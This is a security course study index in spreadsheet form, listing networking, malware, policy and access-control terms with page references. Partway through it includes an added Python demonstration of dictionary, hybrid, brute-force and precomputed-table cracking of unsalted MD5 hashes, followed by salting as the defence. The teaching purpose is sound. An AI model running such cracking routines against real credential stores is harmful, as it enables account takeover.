print_1_PRINTED_.xlsx - Yimg

Keyword                                           Book Page  Notes
LAN                                               1       6  owned by a single entity; trusted users access network and server resources
LAN threat                                        1       6  disgruntled employee, or a trustworthy employee who was fooled
logic bomb inside LAN                             1       6  a threat that deleted all files inside a company, so they lost a lot of money because of LAN trust
insider, internal threat                          1       7  someone who has access to information; consider all access to LAN resources when evaluating
MAN                                               1       7  spans a city or town; uses high-speed media; connects several facilities together
WAN                                               1       7  large geographic area; uses public networks
Internet                                          1       7  connects many LANs, MANs and WANs together in the world's largest network
ISP (Internet service provider)                   1       7  responsible for the integrity and connectivity of all LANs, WANs, MANs
POP (point of presence)                           1       7  ISPs provide Internet access to customers through a POP
NAP (network access points)                       1       7  ISPs provide Internet access to customers through a NAP
peering points                                    1       7  ISPs provide connectivity to each other through these points
MAE (metropolitan area exchange)                  1       7  large peering points that provide connectivity between ISPs
PAN (personal area network)                       1       7  usually wireless; range <= 10 m; two or more devices; same party or different parties
Bluetooth PAN                                     1       7  supports up to 7 devices; cable replacement technology; can be used for proprietary protocols and for standards-based protocols
BNEP (Bluetooth network encapsulation protocol)   1       7  responsible for delivering network packets; standards-based protocol
standards-based protocol                          1       7  e.g. Internet access over IP and Bluetooth network encapsulation protocol
physical topology                                 1       8  how the network is wired together, described through geometric shapes; how the network is actually connected
bus physical topology disadvantages               1       8  confidentiality is not guaranteed; low fault tolerance; poor reliability; poor traffic isolation capabilities; limited scalability
ring physical topology disadvantages              1       9  confidentiality is not guaranteed; if one cable drops the loop will have a problem
star physical topology                            1       9  the only one that can prevent eavesdropping; fault tolerance; scalability; supports traffic isolation; confidentiality for traffic
ring physical topology                            1       9  each machine has 2 network connections; bi-directional communication
star physical topology                            1       9  single point of failure; fault tolerance for cables only, not for faulty NICs
switched star network                             1       9  best practice and the only one that can prevent eavesdropping
logical topology                                  1      10  the process a protocol follows to send data, regardless of what the network looks like physically (Ethernet, Token Ring)
physical vs. logical topology                     1      10  they are independent of each other
media access protocols                            1      10  protocols that define the rules for sending signals to each other in a connected network; Ethernet, Token Ring
Ethernet                                          1      11  only a single node should transmit a frame at a time
CSMA/CD                                           1      11
Gigabit                                           1      11  designed for large frames; susceptible to too many small frames
Ethernet                                          1      11  baseband; shared media; most common layer 2
Ethernet frame                                    1      11  chunk of data transmitted by machines; a single machine should transmit 1 frame at a time
jumbo-sized frames                                1      11  optimize network timing for maximum bandwidth efficiency
Token Ring                                        1      13  allocated time; each machine has an equal time to communicate; data travels in a one-way closed loop
token                                             1      13  a specialized frame that carries data
MAU (multi-station access unit)                   1      13  central device that passes tokens serially from one station to the other, one way and in order
Token Ring communication                          1      13  an originating machine puts data into an empty token, which travels to the destination until the originating machine empties the token again
FDDI (fiber distributed data interface)           1      14  two rings: primary ring, second ring for redundancy; data in the second ring flows in the opposite direction
active monitor machine                            1      14  in Token Ring with a MAU, the primary machine checks for malfunctioning machines by polling them 7 times each second
FDDI beacon frame                                 1      14  when a system doesn't see a token for a specific time it sends a beacon
self-diagnostic procedure                         1      14  in Token Ring, a system that identifies itself as having a problem pulls itself from the ring to check itself
FDDI validation against self-diagnostics          1      14  isolates a system with a faulty card that can't diagnose itself properly
FDDI (lack of MAU)                                1      14  can be a physical ring or a physical star, but a physical ring wouldn't allow bypassing troubled areas (disconnected ports, faulty cables)
ATM                                               1      15  Asynchronous transfer module
ATM                                               1      15  cell = 53 bytes; connection-oriented; packet switching; shared network medium; QoS; PVC; SVC; VPI; VCI; video streaming; low latency
VCI (virtual channel identifier)                  1      16  associates cells with a virtual connection across an ATM network
VPI (virtual path identifier)                     1      16  VPI and VCI are used to route ATM cells between switches
ATM PVC                                           1      16  permanent virtual circuit, set up manually in advance
ATM SVC                                           1      16  switched virtual circuit, set up automatically on the fly through a signaling protocol
ATM virtual channel identifier (VCI)              1      16  used to route cells from one ATM switch to another; identifies the connection between two ATM switches
ATM virtual path identifier (VPI)                 1      16  labels a collection of VCIs grouped into a virtual path
WAN technologies                                  1      17
dedicated lines                                   1      17  T1, T3, E1; allowing n sites to connect will need n+1 links
Frame Relay                                       1      17  packet switching; lower cost
MPLS (Multiprotocol Label Switching)              1      18  layer 2.5 technology; supports IP, IPv6, VoIP
ISDN                                              1      18  service profile identifier = 10 digits; ISDN connection identifier = 4 digits; problem: backdoor
SPID (service profile identifier)                 1      18  establishes a connection between ISDN sites
DSL                                               1      18  low cost; uses existing phone lines; high speed
cable modem                                       1      18  Data over cable interface specification (DOCSIS)
WAN aggregation                                   1      18  it may be necessary to implement aggregation devices to support multiple WAN links and multiple WAN protocols
Data over cable interface specification (DOCSIS)  1      18  ITU; cable television companies provide Internet access over existing TV cables
UTP                                               1      21
cat 1, 2                                          1      21  voice, low bandwidth
cat 3                                             1      21  voice, 10 Mb
cat 4                                             1      22  voice, 16 Mb
cat 5                                             1      22  100 Mb
cat 5e, 6                                         1      22  more than 100 Mb
network tap                                       1      22  to see all traffic on a raw wire without having to reconfigure the switch
vampire tap                                       1      22  to see all traffic on coaxial without having to reconfigure the switch
time domain reflectometer                         1      22  a good cable tester to check the compliance of cabling
NIC auto-sensing                                  1      23  the NIC automatically detects the cable type for proper communication
crossover                                         1      24  its primary use is to connect an external router to a firewall; +TX to +RX and -TX to -RX
network devices                                   1      25  switch, hub, router, bridge, repeater
switch layer 3, 7                                 1      27
VLAN                                              1      29  creates separate networks through software, not hardware
NAC (network access control)                      1      29  isolates systems initially connected in VLANs until they are scanned
resource separation                               1      31  one of the elements of defense in depth (separate DNS, mail, web server)
network design objectives                         1      31  separate servers; protect the internal network; provide defense in depth; protect all systems
network segments, sections                        1      32  public, semi-public, private
border router                                     1      33  assists the firewall: blocks RFC 1918; only packets from our ISP range can leave our network, to protect the firewall itself

module 2
protocol stack                                    1      40  set of protocols needed together for communication; each layer receives a service from the lower layer and provides a service to the upper
network protocol                                  1      41  standardizes the format, order, timing and meaning ... of communications
OSI                                               1      43
transport layer                                   1      43  handles sequencing and provides reliable end-to-end connectivity
session layer                                     1      44  handles the establishment and maintenance of connections
presentation                                      1      44  handles format and compression: JPEG, MPEG ...
OSI vs TCP/IP                                     1      45
layer independence                                1      46  makes it faster to write network programs but makes security weaker
TCP/IP packet generation                          1      47
IP (Internet Protocol)                            1      49
IPv4 header                                       1      51  minimum 20 bytes, maximum 60 bytes
IPv4 options - record route                       1      51  tells routers to add their IP address into the options field
IP timestamp                                      1      51  tells routers to write a timestamp into the options field
IPv4 options - strict source routing              1      51  allows the sender to specify the exact route to the destination
IPv4 options - loose source routing               1      51  allows the sender to specify a list of routers a packet must pass through; it may also traverse other routers if required
IPv4 header - fields                              1      52
routing loops                                     1      53  TTL guards against routing loops
fragmentation attacks                             1      53  send malicious commands fragmented; send too-small fragments; send overlapping fragments
IPv4 header - byte numbers                        1      54  byte 9: protocol number; bytes 10, 11: protocol checksum
class A, B, C                                     1      58  A 1-127, B 128-191, C 192-223
CIDR (Classless Inter-Domain Routing)             1      60  uses VLSM (variable length subnet mask) to allocate IPs to subnets according to individual needs
broadcast address                                 1      62
directed broadcast address                        1      62  passed by routers
limited broadcast                                 1      62  not passed by routers; 255.255.255.255
private address                                   1      63  10.0.0.0/8, 172.16.0.0-172.31.0.0/12, 192.168.0.0/16, 127.0.0.0/8 loopback
MAC address                                       1      65
DLCI (data link control identifier)               1      65  10-bit layer 2 address; Frame Relay
ARP (Address Resolution Protocol)                 1      67  given an IP address, determine the MAC; RFC 826
ARP                                               1      68  is independent of IP; EtherType in the Ethernet frame = 0x0806
EtherType                                         1      68  the field that indicates the higher-layer protocol in an Ethernet frame, e.g. IP = 0x0800
ARP header, types                                 1      68  ARP is not restricted to MAC and IP only
lmhosts file                                      1      72  contains mappings from NetBIOS names to IP addresses
/etc/hosts                                        1      72  DNS; system root/system32/drivers/etc/hosts
DNS - top level domains                           1      73  generic and country code
DNS                                               1      74  Domain Name System
DNS - authoritative DNS server                    1      74  responsible for a domain and has a list of subdomains
DNS query                                         1      75  local DNS server >> root DNS server >> top level DNS server
authoritative reply                               1      75  the DNS client can use the data and make the actual connection
DNS query type                                    1      75  gethostbyname, gethostbyaddr
FQDN                                              1      75  fully qualified domain name
DNS TTL                                           1      75  for well-known sites a higher TTL value to avoid overloading; for sites that change a lot a lower TTL value, because the address changes frequently
DNS - recursive query                             1      76  the client asks the server to do the whole DNS lookup for it and send the final reply to the client
nslookup                                          1      76  a way to make forward lookups and reverse lookups
DNS cache poisoning                               1      77  poisoning a DNS cache so clients are directed to the wrong places
DNS denial of service                             1      77  flooding a DNS server with queries
DNS footprinting                                  1      78  uses zone transfers and reverse lookups to learn about the network; solution = limit zone transfers, split DNS
DNS - split DNS                                   1      78  people receive different IP answers depending on whether they are inside or outside
registration spoofing                             1      78  social engineering attack; the attacker convinces the registrar that the domain exists in another DNS
IPv6 address space                                1      80  340 undecillion addresses
IPv6 vs IPv4                                      1      81  IPv6 supports authentication, encryption and quality of service
IPv6 features                                     1      82
IPv6 autoconfiguration                            1      82  based on the local MAC address and information from the default gateway
IPv4 over IPv6 (translation)                      1      82
IPv6 over IPv4 (tunneling)                        1      82  uses IPv4 protocol number = 41
AYIYA                                             1      82  anything in anything tunneling
Teredo                                            1      82  tunneling IPv6 over UDP through NAT
IPv6 fixed header size                            1      82  40 bytes of fixed size
IPv6 next header                                  1      82  like the protocol field in IPv4; currently supports AH and ESP
EUI (extended unique identifier)                  1      83  FFFE is inserted inside the MAC to identify IPv6
IPv6 network prefix                               1      83  FE80 local network; FF00 multicast traffic; 2001 large ISP interdomain; 2002 IPv6 to IPv4 gateways
IPv6 header                                       1      85  flow label and traffic class are used for QoS

module 3
UDP                                               1      92
UDP checksum                                      1      92  optional and not required; checks the data and header; not optional for IPv6
UDP multicast                                     1      93  UDP is used for multicasting because TCP is hard to use in such environments
UDP port numbers                                  1      93  DNS = 53, BOOTP = 67, 68, TFTP = 69, NTP = 123, NBT = 137-139, SNMP = 161 and 162, NFS = 2049
UDP file transmission                             1      93  NetBIOS uses UDP to transfer local files
TFTP (Trivial File Transfer Protocol)             1      94  used to transfer files from one device to another without authentication
UDP header                                        1      95  size = 8 bytes
TCP common ports                                  1      99  FTP 20, 21; Telnet 23; SMTP 25; DNS 53; finger 79; HTTP 80; POP 110; HTTPS 443
FTP                                               1     100  File Transfer Protocol; RFC 959
FTP command channel / control channel             1     100  the user authenticates and uses commands in this channel to start transferring files; port 21
FTP data channel                                  1     100  where the actual data transfer happens; port 20
FTP - anonymous FTP                               1     100  no predefined username and password; threat of becoming a warez site; prevent GET with an authoritative account
FTP - blind FTP                                   1     101  security through obscurity; prevents one user from seeing the names of files uploaded by other users
FTP - PORT command                                1     101  can ask the FTP server to initiate a connection to a specific port and IP address; used to scan the network
FTP - active and passive                          1     102  in active mode the server initiates the connection; in passive mode the client initiates the connection
TCP connection                                    1     104  uses piggybacked packets a lot; sends many ACKs
TCP header size                                   1     105  normal size is 20 bytes, but if options are used it will be more than that
ECN (explicit congestion control)                 1     105  the last two bits of reserved and the first 2 bits of byte 13 in the TCP header; CWR = Congestion Window Reduced, ECE = ECN Echo
TCP flags                                         1     106  in byte 13: URG, ACK, PSH, RST, SYN, FIN
TCP options                                       1     106  maximum segment size, window scale, selective ACK, timestamp, no operation (NOP)
TCP - initial sequence number                     1     108  a random or semi-random value that allows referring to bytes in a packet
TCP - acknowledgement number                      1     108  specifies the sequence number of the next byte the receiver expects
TCP flags / code bits                             1     109  C, E, U, A, P, R, S, F
TCP - (CWR) congestion window reduced             1     109  associated with the protocol known as explicit congestion notification
TCP - (ECE) ECN Echo                              1     109
TCP - urgent flag                                 1     109  important data is located by the urgent pointer; it's up to the client to set it and up to the server to decide what to do with it; Telnet, rlogin
TCP - PSH flag                                    1     110  tells the receiver that a packet should not be buffered; Telnet, SSH
TCP - (FIN) connection termination                1     111  graceful termination with FIN, ACK; abrupt closure with RST/ACK
TCP - graceful termination                        1     113  tcpdump of a graceful termination using FIN/ACK
TCP - aborted termination                         1     114  tcpdump of an aborted termination using the R flag
TCP vs UDP                                        1     116  different address spaces for UDP and TCP
ICMP (Internet Control Message Protocol)          1     118  ICMP is encapsulated in an IP packet; connectionless; error reporting; network troubleshooting
ICMP payload                                      1     119  the header of the IP packet + 8 bytes of IP payload, which include the source and destination ports
ICMP common types                                 1     120  type 8 echo request, type 0 echo reply, type 3 destination unreachable, type 5 redirect, type 11 time exceeded
ping                                              1     122  local LANs < 10 ms; WAN and Internet > 200-300 ms
ICMP security issues                              1     122  covert data channel; denial of service; mapping a network
traceroute, tracert                               1     124  increases the TTL value by 1 each time and checks the sender IP of the destination unreachable or time exceeded error
traceroute                                        1     125  Unix uses UDP packets and Windows uses ICMP packets

module 4
sniffer                                           1     134  it's important to use promiscuous mode to see all traffic
dsniff, ettercap                                  1     135  tools used to sniff inside a switched network environment
packet sniffer usage                              1     135  monitor, gather, analyze, debug, detect, gain, filter
sniffer examples                                  1     136  rootkit sniffers seek usernames and passwords on the network
sniffing - switch                                 1     137
ettercap                                          1     137  the attacker sends false ARP replies to associate his MAC address with the target host
libpcap                                           1     138
winpcap                                           1     138
tcpdump                                           1     138  free; Unix version depends on libpcap, windump depends on winpcap; doesn't interpret events
tcpdump options                                   1     139  -x hex output, -w write to file, -r read a file, -i specify the interface, -nn don't resolve IPs and ports, -s specify the size of packets
tcpdump ICMP                                      1     142  output format
tcpdump UDP                                       1     143  the bytes field in the output indicates the number of bytes in the UDP payload
tcpdump TCP                                       1     144  in a SYN packet establishing a connection there is no data inside the TCP segment
hexadecimal                                       1     148
decoding packets                                  1     150  five tips for decoding packets
decoding IP header                                1     152
decoding TCP header                               1     160
IP checksum                                       1     158  16-bit one's complement of the IP header only
bit-flipping attacks                              1     158  a way to manipulate the checksum of the IP header
TCP header urgent                                 1     164  like Ctrl+C; TCP doesn't include the size of options
TCP options size                                  1     165  TCP header length - minimum TCP header length
TCP payload size                                  1     166  IP total length - (IP header length + TCP header length)

module 5
virtualization                                    1     174  general term for the abstraction of resources to overcome the 1:1 relationship between OS and hardware
virtualization platform                           1     174  taking a software platform and running multiple platforms on a single piece of hardware, like a virtual machine
virtualization resource                           1     175  virtualizing hardware, like the database; each system shares the same hardware but doesn't know that
virtual machine, OS level                         1     176  like a Windows VM; good because some tools don't work on a specific OS
virtual machine, application level                1     176  running an application on a VM prevents attackers from attacking the host system
host OS                                           1     177  the main OS that runs the virtual machine
guest OS                                          1     177  the OS installed on a virtual machine
virtual machine types                             1     181  Virtual PC from Microsoft, Parallels for Macintosh
VMware extensions                                 1     182  .vmx VM configuration; .nvram VM BIOS; .vmdk VM disk file; .vmss suspended state file; .vmsn snapshot file
VMware Player                                     1     184  free; runs on Windows, Linux; fully compatible
VMware Workstation                                1     186  ability to create snapshots, cloning, secure portability of VMs
VMware ACE capability                             1     187  the ACE feature allows you to put a VM on a USB flash drive safely
VMware Fusion                                     1     191  the Unity feature allows you to run Windows applications on a Mac

module 6
physical security - objective                     1     213
key catcher                                       1     214  a small 2" device to capture keystrokes; memory up to 8 MB
evacuation procedures                             1     218
evacuation route posting                          1     218  signs; multiple copies of the evacuation procedure
meeting point                                     1     219  choose an easy walking distance
evacuation practice                               1     219  take drills seriously; take action against those who ignore alarms; employees should be trained in cross roles
safety warden                                     1     220  responsible for the evacuation team; last one to leave
meeting point leader                              1     220  accounts for employees; first one out
searcher                                          1     220  checks each place for employees; puts up signs that no one is there
stairwell/door monitor                            1     220  directs employees to the stairs; makes sure there is no dangerous material; hands a flashlight to employees
special needs assistance                          1     220  responsible for keeping a list of all who need assistance
evacuation roles                                  1     220  safety warden, meeting point leader, searcher, stairwell/door monitor, special needs assistance
safety plan considerations                        1     222  should consider: smoke and fire, natural gas explosion, toxins, poor air quality, structural failure
smoke and fire                                    1     223  detective controls: smoke detectors, heat sensors; suppressive controls: sprinklers, fire extinguisher
optical smoke sensors                             1     223  light beam and detecting plate; when smoke particles obscure the detector it will alert
heat sensors                                      1     223  like a thermometer; operates when there is a rise in temperature
portable fire extinguisher                        1     223  combustible (paper, wood): type A, Δ; liquids: type B, □; electrical: type C, ○
fire types                                        1     223  combustible (paper, wood): type A, Δ; liquids: type B, □; electrical: type C, ○
toxins                                            1     225  radon and carbon monoxide; use specialized detectors
toxins threat                                     1     225  use filtration masks; hermetically sealed vaults
ventilation exhaust systems                       1     225  expel the air in areas served by air conditioning, either naturally or by fans
natural ventilation                               1     226  moving air through a door
toxic dampers                                     1     226  ventilation systems are equipped with them to prevent toxic gas spreading through the ventilation system
water/flood                                       1     227  detective controls: moisture/humidity sensors; corrective controls: bilge pump, evacuation
moisture detectors                                1     227  a detective control used to detect water/flood; installed on surfaces
humidity detectors                                1     227  a detective control used to detect water/flood; used for water vapor
bilge pump                                        1     227  corrective control for water/flood, to remove water
structural failure                                1     228  can happen from gradual structural weakening or sudden weakening; detective controls: structural assessment, sudden impact
gradual structural weakening                      1     228  a result of a series of lesser events
structural gradual weakening                      1     228  a result of a series of lesser events
sudden structural failure                         1     228  may result from earthquakes, storms, explosions, sinkholes
structural sudden event                           1     228  may result from earthquakes, storms, explosions, sinkholes
structural assessment                             1     228  a detective control when taking over an old building
managing power                                    1     229  power needs are increasing; server density is increasing; it takes a long time to increase capacity
managing cooling                                  1     229  increased server density means more heat; temperature varies from place to place
power and cooling issues                          1     230  average 65 F or 18 C; redundancy; scalable solutions; humidity = 45%
power quality issue - sag                         1     231  voltage drop (short)
power quality issue - brownout                    1     231  voltage drop (sustained)
power quality issue - spike                       1     231  voltage increase (short)
power quality issue - surge                       1     231  voltage increase (sustained)
power quality issue - fault                       1     231  power failure (short)
power quality issue - blackout                    1     231  power failure (sustained)
UPS (uninterruptible power supply)                1     232  installed inline; sufficient power for 15-30 min
backup generators                                 1     232  convert fuel into electrical power; aren't suitable for short-duration failures because they need time to warm up
restricted area                                   1     234  measures must be implemented to avoid unwanted access, to detect if unwanted access occurs, and to define a procedure if a breach happens
perimeter definition                              1     234  an enclosed space that has been labeled a restricted area
perimeter assessment                              1     234  area geography, traffic patterns, activities of other buildings, area crime statistics
perimeter dimensions                              1     235  floor: raised floors, in-floor ventilation; wall: doors, windows
unauthorized access                               1     236  deterrent controls to prevent it using guards, signs, employee-only signs
restricted area - escort                          1     237  employee escort: disable all his access; take badge, parking decal; escorted by a guard or at least two managers
escort from restricted area                       1     237  employee escort: disable all his access; take badge, parking decal; escorted by a guard or at least two managers
access control types                              1     238  directive, preventive, deterrent, detective, suppressive, reactive, corrective
unauthorized access - preventive                  1     239
locks                                             1     238  traditional, cipher locks, smart card, smart card with passcode, biometrics
traditional locks                                 1     240  consist of a metal lock and key; re-keying must be performed for all users
cipher/combination locks                          1     240  mechanical locks accept one valid sequence; electronic locks can be programmed with multiple keys
cipher/combination locks                          1     240  re-keying must be performed for all users if any one user is to be removed from the authorized list
smart cards                                       1     241  electronic badges that include a magnetic strip or chip that can record and replay a set key
smart cards rekeying                              1     241  re-keying is inexpensive because it requires only removing the current acceptable code from the lock
biometrics                                        1     241  provide checking of physical characteristics of the human body
mantraps                                          1     241  a secure portal that requires the individual to identify himself to pass
contraband checks                                 1     242  deterrent and detective controls; X-ray scanner, metal detector, bag inspection
unauthorized access - deterring                   1     242  fences, X-ray scanners, metal detector, bag inspection
fences                                            1     242  deterrent controls
unauthorized access - detecting                   1     243  CCTV, watch towers, motion detector, heat sensors
CCTV (closed circuit television)                  1     243  detective and preventive control
dummy camera                                      1     243  preventive control
security lights                                   1     243  detective control
panic button                                      1     244  detective control; silent alarm so as not to inform the intruder
automatic intruder detection                      1     244  vibration, heat, pressure, beam sensors
safety walkthrough                                1     245  exit doors must be clear; doors function properly; alarms fully functional; people know what to do
physical security - managing                      1     246  encryption, guards, signs, mantraps, shred everything, inspect packages to know what is leaving your organization
Key word                      Book       Page
DID                                  2       6
Risk                                 2       7
Key focus of Risk                    2       8
Prioritizing CIA                      2      10
Threat                               2      11
Vulnerabilities                      2      12
DID - Approaches to did              2      14
Uniform protection                    2      15
Protected Enclaves                    2      16
Information Centric                  2          17
Vector-Oriented DID                  2          18
Malicious SW                         2          20
Malware                              2          20
malicious mobile code                2          20
Virus                                 2      21
Parasitic Malware                    2          21
Boot record infector                 2          21
Macro Virus                           2      22
Program Infectors                    2          22
File Infectors                       2          22
COM/Script Program Infector          2          23
cavity viruses                       2          23
EXE program infector                 2          24
CS(code Segment)                     2          24
IP(Instruction Pointer)              2          24
Multipartite Viruses                 2          24
Worms                                2          25
worm - Impacts                       2          26
Morris Worm                          2          27
Linux Worms                          2          28
Ramen                                2          28
Lion                                 2          29
SQL Slammer                          2          30
MSDE                                 2          30
Sasser Worm                          2          31
Netsky Worm                          2          31
Conficker worm                           2   32
worms - Fix Worm                         2   33
Worms - configuration management         2   34
configuration management                 2   34
Baseline document                        2   35
Malicious Browser content                2   36
ActiveX                                   2   36
DropMyRights                             2   36
Malware Capability                       2   37
CIH Virus                                2   37
chernobyl virus                          2   37
Melissa virus                            2   37
Caligula virus                           2   37
Marker virus                             2   37
Leaves Worm                              2   38
IRC(Internet Relay Chat)                 2   38
Malware propagation techniques           2   39
Sadmind/IIS worm                         2   40
blended threat                           2   41
Nimda                                    2   41
Instant Messaging application            2   41
Peer-to-peer networking                   2   41
Deadhat virus                            2   41
piggybacking                             2   41
MyDoom worm                              2   41
SoulSeek                                 2   41
Malware Defense technique                2   42
Antivirus capability                     2   42
antivirus -Scanners                      2   43
antivirus - Activity monitoring          2   43
antivirus - Integrity check              2   43
heuristic anti-virus                      2   43
anti-virus - heuristic                    2   43
Tripwire Sw                              2   43
AIDE                                     2   43
Stripping E-mail Attachment              2   44
antivirus -Stripping E-mail Attachment   2   44
Malware - Analysis                       2   45
Malware - Mitigating                    2   45
Patch Management                        2   45
Network-aware tools                     2   45
Tripping point                          2   45
Malware - user education and policy     2   46

Security policy                         2   52
Security policy - Why ?                 2   52
policy - Convincing the org by policy   2   54
Mission Statement                       2   55
Security posture                          2   56
conservative approach                     2   56
liberal approach                          2   56
Posture Issues Example                  2   57
policy - Baseline document              2   59
Baseline document - policy              2   59
ISO 17799                               2   59
HIPAA                                   2   59
AUP (Acceptable use policy)             2   59
policy vs. Procedure                    2   60
Procedure vs. policy                    2   60
policy - definition                     2   61
Procedure - definition                  2   62
Standard - definition                   2   63
Baseline - definition                   2   64
Guideline - Definition                  2   65
Issue-specific Policies                 2   67
policy table of content                 2   68
policy statement must                   2   70
SMART                                   2   70
ISMS                                    2   71
Policy categories                       2   71
Program Policy                          2   71
Issue-specific Policies                 2   71
System Specific Policy                  2   71
Policy - Creating                       2   73
Policy Creating - Issue                 2   74
AUP (Acceptable use policy)             2   74
policy - Scope/Applicability      2    75
Non-Compliance                          2    76
Penalties                         2    76
Issue-specific Policies Example   2    77
Non-Disclosure Agreement                2    78
NDA (Non-Disclosure Agreement)          2    78
Copyright                         2    79
Intellectual Property             2    79
DMCA                              2    80
POC                               2    80
Contingency planning                    2    82
BCP (business continuity plan)    2    83

BRP (Business Resumption plan)    2    84
DRP (disaster recovery plan)      2    85
BCP Vs. DRP                       2    87
BCP/DRP                           2    88
Insurance model                   2    88
Split operation Model             2    88
Routing workload                  2    88
BCP elements                      2    89
BCP Key Component                 2    91
BIA (Business Impact Analysis)    2    92
MTD(maximum tolerable downtime)   2    92
BCP-DRP lifecycle                 2    94
BCP/DRP Mistakes                  2    95

Access Control                    2   101
Access Control Scope              2   102
Data Owner                        2   103
Data Custodian                     2   103
Account Management                2   102
Account control                   2   102
Data classification               2   104
SBU (sensitive but unclassified)   2   104
Identity                          2   106
Authentication                           2   106
Authorization                            2   106
Accountability                           2   106
something you know                         2   106
something you have                         2   106
something you are                          2   106
someplace you are                          2   106
Access Control / Controlling Access        2   108
need to know                             2   108
Access Control Techniques                2   109
DAC (Discretionary Access control)       2   109
MAC (Mandatory Access control)           2   109
RBAC (Role-based Access control)         2   109
REBAC(ruleset-based Access control)      2   110
List based Access control                2   110
Token based Access control               2   110
Access managing                          2   111
account administration                   2   111
SSO (Single Sign On )                    2   112
Centralized control                      2   114
PAP (Password Authentication Protocol)           2   113
CHAP (Challenge Handshake Authentication Protocol) 2   113
Dial-in Authentication                           2   114
TACACS (Terminal Access Controller Access Control System) 2   114
RADIUS (Remote Authentication Dial-In User Service)       2   114
DIAMETER                                 2   113
AD Authentication                        2   114
Kerberos - Authentication                2   113
Replay attack                            2   113
Windows NT authentication                      2   114
Reversible encryption                    2   116
EFS (Encrypted file system)              2   116
reverse engineering                      2   116
irreversible encryption                  2   117
one way encryption                       2   117
Access control: Passwords                2   118
Cracking                                 2   119
password cracking                   2   119
password cracking - methods         2   122
password storage                    2   119
password Strength                   2   120
password assessment                 2   122
cracking - methods                   2   123
Dictionary attack                   2   123
Hybrid attack                       2   123
Brute force attack                  2   123
Pre-computation Attack              2   124
Rainbow table                       2   124
Cracking Motivation                 2   124
John the Ripper+MD5                 2   125
Bit-slicing                         2   125
open BSD                            2   125
free BSD                            2   125
John the Ripper support               2   126
John the Ripper cracking modes        2   126
wordlist mode                       2   126
single crack mode                   2   126
incremental mode                    2   126
external mode                       2   126
Cracking RedHat password file         2   126
john.ini                            2   126
MD5                                 2   127
Windows password                    2   128
LAN Manager (LM)                      2   128
cain-password cracking              2   130
DLL injection                       2   130
SYSKEY                                2   130
SAM                                 2   131
cain - Dictionary attack            2   131
cain - Brute force attack           2   131
cain - Cryptanalysis attack         2   131
Rainbow table                       2   133
cryptanalytic                       2   133
Winrtgen                              2   134
Ophcrack                              2   134
charset.txt                           2   134
Zhu Shuanglei's RainbowCrack          2   134
Zhu Shuanglei's RainbowCrack          2   136
cain - Rainbow tables                 2   136
protecting against password cracking  2   137
password policy - Enforce strong    2   138
password policy - Enforce strong    2   139
Shadow passwords                    2   141
one-time password                   2   142
Token-based devices                 2   142
Challenge/response                    2   142
S/Key                               2   142
Biometrics                          2   144
Mannerisms                          2   144
Portal throughput                   2   144
Type I (alpha) error                  2   144
Type II (beta) error                  2   145
False Reject Rate                   2   145
False Accept Rate                   2   145
Crossover Error                     2   145
Equal error rate                    2   145
FRR (False Reject Rate)             2   145
FAR (False Accept Rate)             2   145
CER (Crossover Error)               2   145
EER(Equal error rate)               2   145
Enrollment                          2   145
Facial thermograms                  2   145
NTLM                                2   146
NTLMv2                              2   147
Pre-computation                     2   147
LMCompatibilityLevel registry value   2   146
Pre-computation attack - fighting   2   147
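
The cracking methods in the rows above (dictionary, hybrid, brute force/incremental, pre-computation), followed by the countermeasure the "fighting pre-computation" row refers to, as an added example that is not part of the original notes. Unsalted MD5 stands in for any unsalted scheme (LAN Manager, NTLM); the user names, passwords and word list are constructed for the demo.

```python
"""Added example: cracking methods against a constructed unsalted password file,
and why a per-user salt defeats the pre-computed table."""
import hashlib
import itertools
import os


def md5hex(text):
    """The 'encrypt each candidate' step: hash it the way the target system does."""
    return hashlib.md5(text.encode()).hexdigest()


# Constructed sample password file: user -> unsalted hash. Two users chose "Hello";
# with no salt their hashes are identical, which a cracker spots for free.
USERS_UNSALTED = {
    "alice": md5hex("Hello"),
    "bob": md5hex("he110"),
    "carol": md5hex("Hello"),
}

WORDLIST = ["password", "letmein", "Hello", "summer"]  # constructed, tiny


def mangle(word):
    """Hybrid-attack rules for one dictionary word: as typed, lowercased,
    leet-speak (l->1, o->0, so Hello -> he110), reversed, and two appended digits."""
    base = {word, word.lower(), word.lower().translate(str.maketrans("lo", "10")), word[::-1]}
    out = set(base)
    for w in base:
        for d in range(100):
            out.add(f"{w}{d:02d}")
    return out


def dictionary_attack(target_hash, wordlist, hybrid=False):
    """Take each candidate, hash it, compare with the stored hash."""
    for word in wordlist:
        for cand in (mangle(word) if hybrid else [word]):
            if md5hex(cand) == target_hash:
                return cand
    return None


def brute_force(target_hash, charset="abcdefghijklmnopqrstuvwxyz0123456789", max_len=3):
    """Incremental mode: every combination up to max_len. Always succeeds eventually;
    the password policy's job is to make 'eventually' longer than the change interval."""
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            cand = "".join(combo)
            if md5hex(cand) == target_hash:
                return cand
    return None


def build_precomputed_table(wordlist):
    """Pre-computation attack: hash the candidate space once, store hash -> plaintext;
    cracking any number of unsalted hashes is then a lookup. (A rainbow table stores
    the same information compressed into hash chains: memory traded for time.)"""
    table = {}
    for word in wordlist:
        for cand in mangle(word):
            table[md5hex(cand)] = cand
    return table


def crack_with_table(user_hashes, table):
    return {user: table.get(h) for user, h in user_hashes.items()}


# Countermeasure: a random per-user salt. The same password now yields different
# hashes, and a table built in advance cannot cover every salt value.
def salted_hash(password, salt=None):
    salt = os.urandom(8) if salt is None else salt
    digest = hashlib.sha256(salt + password.encode()).hexdigest()
    return salt.hex() + "$" + digest


def verify_salted(password, stored):
    salt_hex, _ = stored.split("$", 1)
    return salted_hash(password, bytes.fromhex(salt_hex)) == stored


if __name__ == "__main__":
    print("alice, plain wordlist:", dictionary_attack(USERS_UNSALTED["alice"], WORDLIST))
    print("bob, plain wordlist:  ", dictionary_attack(USERS_UNSALTED["bob"], WORDLIST))
    print("bob, hybrid rules:    ", dictionary_attack(USERS_UNSALTED["bob"], WORDLIST, hybrid=True))
    print("table lookup:", crack_with_table(USERS_UNSALTED, build_precomputed_table(WORDLIST)))
    print("salted 'Hello' twice:", salted_hash("Hello"), salted_hash("Hello"))
```

Run it and note that the plain word list finds alice but not bob, the hybrid rules find both, and the table cracks all three at once. The two salted digests of "Hello" differ, so neither the identical-hash giveaway nor the table works against them.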

Incident Handling                   2   153
Incident                            2   155
Event                               2   156
Incident                            2   157
incident handling steps               2   159
Incident Handling-Preparation(1)      2   160
Incident Handling-Preparation(1)      2   162
Jump bag contents                       2   163
Incident Handling-identification(2)   2   164
Incident Handling-identification(2)   2   165
